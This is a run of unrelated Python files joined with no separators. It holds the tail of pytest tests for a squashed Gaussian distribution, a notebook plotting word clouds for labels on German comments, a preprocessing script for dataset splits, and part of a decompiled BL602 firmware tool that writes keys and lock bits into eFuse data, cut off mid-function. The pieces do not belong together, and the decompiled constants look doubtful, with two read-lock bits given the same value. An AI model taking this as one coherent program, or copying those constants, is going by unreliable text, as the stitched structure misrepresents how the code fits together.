log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) actual = log_probs.d assert expected.shape == (batch_size, 1) assert np.allclose(expected, actual[:, 0, :], atol=1e-3, rtol=1e-2) # Check all the samples mu = np.reshape(mu, newshape=(batch_size, 1, output_dim)) ln_var = np.reshape(ln_var, newshape=(batch_size, 1, output_dim)) x = np.arctanh(samples.d, dtype=np.float64) gaussian_log_prob = -0.5 * np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mu) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) actual = log_probs.d assert np.allclose(expected, actual, atol=1e-3, rtol=1e-2) def test_sample_multiple_and_compute_log_prob_shape(self): batch_size = 10 output_dim = 10 input_shape = (batch_size, output_dim) mean = np.zeros(shape=input_shape) sigma = np.ones(shape=input_shape) * 5. ln_var = np.log(sigma) * 2. 
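# Note: throughout these tests ln_var is the log of the variance, i.e.
# ln_var = log(sigma**2) = 2 * log(sigma), which is why it is built as
# np.log(sigma) * 2 above.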
distribution = D.SquashedGaussian(mean=mean, ln_var=ln_var) num_samples = 10 samples, log_probs = distribution.sample_multiple_and_compute_log_prob( num_samples=num_samples) nn.forward_all([samples, log_probs]) assert samples.shape == (batch_size, num_samples, output_dim) assert log_probs.shape == (batch_size, num_samples, 1) @pytest.mark.parametrize("x", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("mean", np.arange(start=-1.0, stop=1.0, step=0.25)) @pytest.mark.parametrize("var", np.arange(start=1.0, stop=2.0, step=0.25)) def test_log_prob_internal(self, x, mean, var): input_shape = (10, 10) dummy_mean = np.zeros(shape=input_shape) dummy_sigma = np.ones(shape=input_shape) dummy_ln_var = np.log(dummy_sigma) * 2.0 distribution = D.SquashedGaussian(mean=dummy_mean, ln_var=dummy_ln_var) ln_var = np.log(var) gaussian_log_prob = -0.5 * \ np.log(2.0 * np.pi) - 0.5 * ln_var - \ (x - mean) ** 2 / (2.0 * var) log_det_jacobian = np.log(1 - np.tanh(x) ** 2) expected = np.sum(gaussian_log_prob - log_det_jacobian, axis=-1, keepdims=True) x_var = nn.Variable((1, 1)) x_var.d = x actual = distribution._log_prob_internal( x_var, mean=mean, var=var, ln_var=ln_var) actual.forward(clear_no_need_grad=True) actual = actual.d assert np.isclose(expected, actual) if __name__ == "__main__": pytest.main() # --- # jupyter: # jupytext: # formats: ipynb,py:percent # text_representation: # extension: .py # format_name: percent # format_version: '1.3' # jupytext_version: 1.11.1 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # %% from utils import loading, nlp, cleaning, visualizing, feature_engineering import pandas as pd from nltk.corpus import stopwords stopwords=stopwords.words('german') from string import punctuation from collections import Counter import matplotlib.pyplot as plt # %% tags=[] df = loading.load_extended_posts() # %% df = feature_engineering.add_column_ann_round(df) # %% [markdown] # Defining function for top words for labels # %% def top_words_label(df, label, text, stop=False, stopwords=None, plot=True, return_list=True, all_plots=True): df_clean=df.dropna(subset=[label]) df_clean.loc[:,text]=cleaning.strip_punct(df_clean[text]) if stop: df_clean.loc[:,text]=nlp.strip_stopwords(df_clean[text], stopwords=stopwords) df_pos = df_clean[df_clean[label]==1] df_neg = df_clean[df_clean[label]==0] topwords_pos = feature_engineering.calculate_top_words(df_pos[text], relative=True) topwords_neg = feature_engineering.calculate_top_words(df_neg[text], relative=True) topwords_pos_rel = topwords_pos.subtract(topwords_neg, fill_value=0).sort_values(ascending=False) topwords_neg_rel = (-topwords_pos_rel).sort_values(ascending=False) if plot and all_plots: print(f'Order of plots:\nTop left: {label} = positive\nTop right: {label} = negative\nBottom left: {label} = positive, specific\nBottom right: {label} = negative, specific') plt.figure(figsize = (12, 12)) plt.subplot(2, 2, 1) visualizing.plot_wordcloud_freq(topwords_pos, colormap='BuGn') plt.subplot(2, 2, 2) visualizing.plot_wordcloud_freq(topwords_neg, colormap='RdPu') plt.subplot(2, 2, 3) visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='YlGn') plt.subplot(2, 2, 4) visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='OrRd') plt.show() elif plot and all_plots==False: plt.figure(figsize=(12,6)) plt.subplot(1, 2, 2) visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='binary') plt.subplot(1, 2, 1) visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='RdPu') plt.show() if 
return_list: return topwords_pos, topwords_neg, topwords_pos_rel, topwords_neg_rel # %% [markdown] # # Getting the top words in comments for every label # %% [markdown] # ## Arguments used # %% arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'body', True, stopwords) # %% tags=[] print(f'top words for argument used positive:\n{arg_pos[:10]}') print(f'top words for argument used negative:\n{arg_neg[:10]}') print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}') print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}') # %% [markdown] # ## Discriminating # %% dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'body', True, stopwords) # %% print(f'top words for discriminating positive:\n{dis_pos[:10]}') print(f'top words for discriminating negative:\n{dis_neg[:10]}') print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}') print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}') # %% [markdown] # ## Inappropriate # %% ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'body', True, stopwords) # %% print(f'top words for innapropriate positive:\n{ina_pos[:10]}') print(f'top words for innapropriate negative:\n{ina_neg[:10]}') print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}') print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}') # %% [markdown] # ## Off-Topic # %% ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'body', True, stopwords) # %% print(f'top words for Off-Topic positive:\n{ot_pos[:10]}') print(f'top words for Off-Topic negative:\n{ot_neg[:10]}') print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}') print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}') # %% [markdown] # ## Personal stories # %% ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'body', True, stopwords) # %% print(f'top words for Personal Stories positive:\n{ps_pos[:10]}') print(f'top words for Personal Stories negative:\n{ps_neg[:10]}') print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}') print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}') # %% [markdown] # ## Possibly Feedback # %% fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords) # %% print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}') print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}') print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}') print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}') # %% [markdown] # ## Sentiment # ### Negative # %% sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords) # %% print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}') print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}') print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}') print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}') # %% [markdown] # ### Neutral # %% snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'body', True, stopwords) # %% print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}') print(f'top words for Sentiment Neutral 
negative:\n{snt_neg[:10]}') print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}') print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}') # %% [markdown] # ### Positive # %% spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords) # %% print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}') print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}') print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}') print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}') # %% [markdown] # # Getting the top words in headline for every label # %% [markdown] # ## Arguments Used # %% arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'headline', True, stopwords) # %% tags=[] print(f'top words for argument used positive:\n{arg_pos[:10]}') print(f'top words for argument used negative:\n{arg_neg[:10]}') print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}') print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}') # %% [markdown] # ## Discriminating # %% dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'headline', True, stopwords) # %% print(f'top words for discriminating positive:\n{dis_pos[:10]}') print(f'top words for discriminating negative:\n{dis_neg[:10]}') print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}') print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}') # %% [markdown] # ## Inappropriate # %% ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'headline', True, stopwords) # %% print(f'top words for innapropriate positive:\n{ina_pos[:10]}') print(f'top words for innapropriate negative:\n{ina_neg[:10]}') print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}') print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}') # %% [markdown] # ## Off-Topic # %% ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'headline', True, stopwords) # %% print(f'top words for Off-Topic positive:\n{ot_pos[:10]}') print(f'top words for Off-Topic negative:\n{ot_neg[:10]}') print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}') print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}') # %% [markdown] # ## Personal stories # %% ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'headline', True, stopwords) # %% print(f'top words for Personal Stories positive:\n{ps_pos[:10]}') print(f'top words for Personal Stories negative:\n{ps_neg[:10]}') print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}') print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}') # %% [markdown] # ## Possibly Feedback # %% fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'headline', True, stopwords) # %% print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}') print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}') print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}') print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}') # %% [markdown] # ## Sentiment # ### Negative # %% sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'headline', True, 
stopwords) # %% print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}') print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}') print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}') print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}') # %% [markdown] # ### Neutral # %% snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'headline', True, stopwords) # %% print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}') print(f'top words for Sentiment Neutral negative:\n{snt_neg[:10]}') print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}') print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}') # %% [markdown] # ### Positive # %% spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'headline', True, stopwords) # %% print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}') print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}') print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}') print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}') # %% [markdown] # ### Wordclouds by annotation round # %% [markdown] # ### negative # %% top_words_label(df.query('ann_round==2'), 'label_sentimentnegative', 'body', True, stopwords, True, False, False) plt.savefig('../pictures/wc_negative_round2.png') # %% top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords, True, False, False) plt.savefig('../pictures/wc_negative_all.png') # %% [markdown] # ### positive # %% top_words_label(df.query('ann_round==2'), 'label_sentimentpositive', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords, True, False, False) # %% [markdown] # ### Discriminating # %% top_words_label(df.query('ann_round==2'), 'label_discriminating', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_discriminating', 'body', True, stopwords, True, False, False) # %% [markdown] tags=[] # ### inappropriate # %% top_words_label(df.query('ann_round==2'), 'label_inappropriate', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_inappropriate', 'body', True, stopwords, True, False, False) # %% [markdown] # ## Off-Topic # %% top_words_label(df.query('ann_round==2'), 'label_offtopic', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_offtopic', 'body', True, stopwords, True, False, False) # %% [markdown] # ## Arguments used # %% top_words_label(df.query('ann_round==2'), 'label_argumentsused', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_argumentsused', 'body', True, stopwords, True, False, False) # %% [markdown] tags=[] # ### Personal stories # %% top_words_label(df.query('ann_round==2'), 'label_personalstories', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_personalstories', 'body', True, stopwords, True, False, False) # %% [markdown] # ### possibly feedback # %% top_words_label(df.query('ann_round==2'), 'label_possiblyfeedback', 'body', True, stopwords, True, False, False) # %% top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords, True, False, False) # %% from argparse import ArgumentParser import numpy as np from preprocessing.compute_caliskan_features import compute_caliskan_features from preprocessing.compute_occurrences import 
compute_occurrences from preprocessing.context_split import context_split from preprocessing.merge_aliases_bipartite import merge_aliases_bipartite from preprocessing.time_split import time_split from util import ProcessedFolder import ipdb import json def fix_seed(seed: int): np.random.seed(seed) def dump_json_split_result(result): for i in range(len(result)): for j in result[i][1].keys(): result[i][1][j] = result[i][1][j].value with open('split_result.json', 'w', encoding='utf-8') as f: json.dump(result, f, ensure_ascii=False) def process_folder(project_folder: ProcessedFolder, n_time_buckets: int, min_context_train: float, max_context_train: float, min_count: int, max_count: int, interactive: bool): # merge_aliases_bipartite(project_folder, interactive) # compute_occurrences(project_folder) # time_split(project_folder, n_time_buckets, uniform_distribution=True) result = context_split(project_folder, min_train=min_context_train, max_train=max_context_train, min_count=min_count, max_count=max_count) dump_json_split_result(result) # compute_caliskan_features(project_folder) def run_preprocessing(n_time_buckets: int, min_context_train: float, max_context_train: float, min_count: int, max_count: int, interactive: bool, random_seed: int = 239, projects_file: str = None, project_folder: str = None, ): fix_seed(random_seed) if project_folder is not None: process_folder(ProcessedFolder(project_folder), n_time_buckets, min_context_train, max_context_train, min_count, max_count, interactive) elif projects_file is not None: projects = [l.strip() for l in open(projects_file, "r").readlines()] for p in projects: process_folder(ProcessedFolder("../gitminer/out/" + p + "/"), n_time_buckets, min_context_train, max_context_train, min_count, max_count, interactive) else: raise ValueError("One of projects folder or projects file should be set") if __name__ == '__main__': parser = ArgumentParser() parser.add_argument("--n_time_buckets", type=int, default=10) parser.add_argument("--min_context_train", type=float, default=0.7) parser.add_argument("--max_context_train", type=float, default=0.8) parser.add_argument("--min_count", type=int, default=100) parser.add_argument("--max_count", type=int, default=int(1e9)) parser.add_argument("--random_seed", type=int, default=239) parser.add_argument("--projects_file", type=str, default="../projects.txt") parser.add_argument("--project_folder", type=str) parser.add_argument("--interactive", action='store_true') args = parser.parse_args() run_preprocessing(args.n_time_buckets, args.min_context_train, args.max_context_train, args.min_count, args.max_count, args.interactive, args.random_seed, args.projects_file, args.project_folder) dkkloimwieder/bl602-reBlDevCube/lib.bl60x.img_create_do.pyc.py # decompyle3 version 3.3.2 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.8.5 (default, Jul 28 2020, 12:59:40) # [GCC 9.3.0] # Embedded file name: lib\bl60x\img_create_do.py import sys, os, hashlib, binascii, getopt from lib import bflb_utils from lib import bflb_aes from lib.bflb_utils import app_path, open_file import ecdsa cfg = bflb_utils.BFConfigParser() keyslot0 = 28 keyslot1 = keyslot0 + 16 keyslot2 = keyslot1 + 16 keyslot3 = keyslot2 + 16 keyslot4 = keyslot3 + 16 keyslot5 = keyslot4 + 16 keyslot6 = 156 keyslot7 = keyslot6 + 16 keyslot8 = keyslot7 + 16 keyslot9 = keyslot8 + 16 keyslot10 = keyslot9 + 16 keyslot11 = keyslot10 + 16 keyslot12 = keyslot11 + 16 rd_lock_key_slot_5 = 31 rd_lock_key_slot_4 = 30 rd_lock_key_slot_3 = 28 rd_lock_key_slot_2 = 28 
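# NOTE (annotation added for readability; inferred from the surrounding decompiled code, not from the original authors):
# keyslot0..keyslot5 appear to be byte offsets into the eFuse image (slot 0 starts at byte 28, each slot is 16 bytes wide),
# and keyslot6..keyslot12 form a second bank starting at byte 156. The rd_lock_* / wr_lock_* constants are bit positions
# that the img_update_efuse_* functions below OR into two lock words (rw_lock0, rw_lock1), which are then written
# (apparently little-endian, via bflb_utils.int_to_4bytearray_l) at efuse_data[124:128] and efuse_data[252:256].
# For example, locking key slot 2 in that code looks like:
#     rw_lock0 |= 1 << wr_lock_key_slot_2   # forbid further writes to slot 2
#     rw_lock0 |= 1 << rd_lock_key_slot_2   # forbid reads of slot 2
#     efuse_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0)
# rd_lock_key_slot_3 and rd_lock_key_slot_2 are both 28 here, which breaks the otherwise consecutive 31..26 pattern
# and may be a defect preserved by the decompiler.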
rd_lock_key_slot_1 = 27 rd_lock_key_slot_0 = 26 rd_lock_dbg_pwd = 23 wr_lock_key_slot_5 = 15 wr_lock_key_slot_4 = 14 wr_lock_key_slot_3 = 13 wr_lock_key_slot_2 = 12 wr_lock_key_slot_1 = 11 wr_lock_key_slot_0 = 10 wr_lock_wifi_mac = 9 wr_lock_chip_id = 8 wr_lock_dbg_pwd = 7 wr_lock_sf_aes_mode = 6 wr_lock_sboot_sign_mode = 5 rd_lock_key_slot_11 = 31 rd_lock_key_slot_10 = 30 rd_lock_key_slot_9 = 29 rd_lock_key_slot_8 = 28 rd_lock_key_slot_7 = 27 rd_lock_key_slot_6 = 26 wr_lock_key_slot_11 = 15 wr_lock_key_slot_10 = 14 wr_lock_key_slot_9 = 13 wr_lock_key_slot_8 = 12 wr_lock_key_slot_7 = 11 wr_lock_key_slot_6 = 10 wr_lock_sw_usage_3 = 9 wr_lock_sw_usage_2 = 8 wr_lock_sw_usage_1 = 7 wr_lock_sw_usage_0 = 6 wr_lock_ana_trim_2 = 5 wr_lock_ana_trim_1 = 4 wr_lock_ana_trim_0 = 3 def img_update_efuse_sp(sign, pk_hash, flash_encryp_type, flash_key, sec_eng_key_sel, sec_eng_key): global cfg fp = open_file(cfg.get('Img_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') efuse_data[0] |= flash_encryp_type efuse_data[0] |= sign << 2 efuse_mask_data[0] |= 15 rw_lock0 = 0 rw_lock1 = 0 if pk_hash != None: efuse_data[keyslot0:keyslot2] = pk_hash efuse_mask_data[keyslot0:keyslot2] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_0 rw_lock0 |= 1 << wr_lock_key_slot_1 if flash_key != None: efuse_data[keyslot2:keyslot4] = flash_key efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 1 << rd_lock_key_slot_3 if sec_eng_key != None: if flash_encryp_type == 0: if sec_eng_key_sel == 0: efuse_data[keyslot2:keyslot3] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 1 << rd_lock_key_slot_3 if sec_eng_key_sel == 1: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot7:keyslot8] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_4 rw_lock1 |= 1 << rd_lock_key_slot_7 if sec_eng_key_sel == 3: efuse_data[keyslot7:keyslot8] = sec_eng_key[16:32] efuse_data[keyslot2:keyslot3] = sec_eng_key[0:16] efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 efuse_mask_data[keyslot2:keyslot3] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock1 |= 1 << rd_lock_key_slot_7 if flash_encryp_type == 1: if sec_eng_key_sel == 0: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 
1: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if flash_encryp_type == 2 or (flash_encryp_type == 3): if sec_eng_key_sel == 0: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 1: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 3: efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_4 efuse_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_mask_data[124:128] = bflb_utils.int_to_4bytearray_l(rw_lock0) efuse_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) efuse_mask_data[252:256] = bflb_utils.int_to_4bytearray_l(rw_lock1) fp = open_file(cfg.get('Img_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_update_efuse_cpu0(sign, pk_hash, flash_encryp_type, flash_key, sec_eng_key_sel, sec_eng_key): fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') efuse_data[0] |= flash_encryp_type efuse_data[0] |= sign << 2 efuse_mask_data[0] |= 15 rw_lock0 = 0 rw_lock1 = 0 if pk_hash != None: efuse_data[keyslot0:keyslot2] = pk_hash efuse_mask_data[keyslot0:keyslot2] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_0 rw_lock0 |= 1 << wr_lock_key_slot_1 if flash_key != None: efuse_data[keyslot2:keyslot4] = flash_key efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 1 << rd_lock_key_slot_3 if sec_eng_key != None: if flash_encryp_type == 0: if sec_eng_key_sel == 0: efuse_data[keyslot2:keyslot3] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot2:keyslot4] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock0 |= 
1 << rd_lock_key_slot_3 if sec_eng_key_sel == 1: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot7:keyslot8] = sec_eng_key[0:16] efuse_mask_data[keyslot4:keyslot5] = mask_4bytes * 4 efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_4 rw_lock1 |= 1 << rd_lock_key_slot_7 if sec_eng_key_sel == 3: efuse_data[keyslot7:keyslot8] = sec_eng_key[16:32] efuse_data[keyslot2:keyslot3] = sec_eng_key[0:16] efuse_mask_data[keyslot7:keyslot8] = mask_4bytes * 4 efuse_mask_data[keyslot2:keyslot3] = mask_4bytes * 4 rw_lock0 |= 1 << wr_lock_key_slot_2 rw_lock1 |= 1 << wr_lock_key_slot_7 rw_lock0 |= 1 << rd_lock_key_slot_2 rw_lock1 |= 1 << rd_lock_key_slot_7 if flash_encryp_type == 1: if sec_eng_key_sel == 0: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 1: efuse_data[keyslot4:keyslot5] = sec_eng_key[16:32] efuse_data[keyslot3:keyslot4] = sec_eng_key[0:16] efuse_mask_data[keyslot3:keyslot5] = mask_4bytes * 8 rw_lock0 |= 1 << wr_lock_key_slot_3 rw_lock0 |= 1 << wr_lock_key_slot_4 rw_lock0 |= 1 << rd_lock_key_slot_3 rw_lock0 |= 1 << rd_lock_key_slot_4 if sec_eng_key_sel == 2: efuse_data[keyslot3:keyslot4] = sec_eng_key[16:32] efuse_data[keyslot4:keyslot5] = sec_eng_key[0:16] 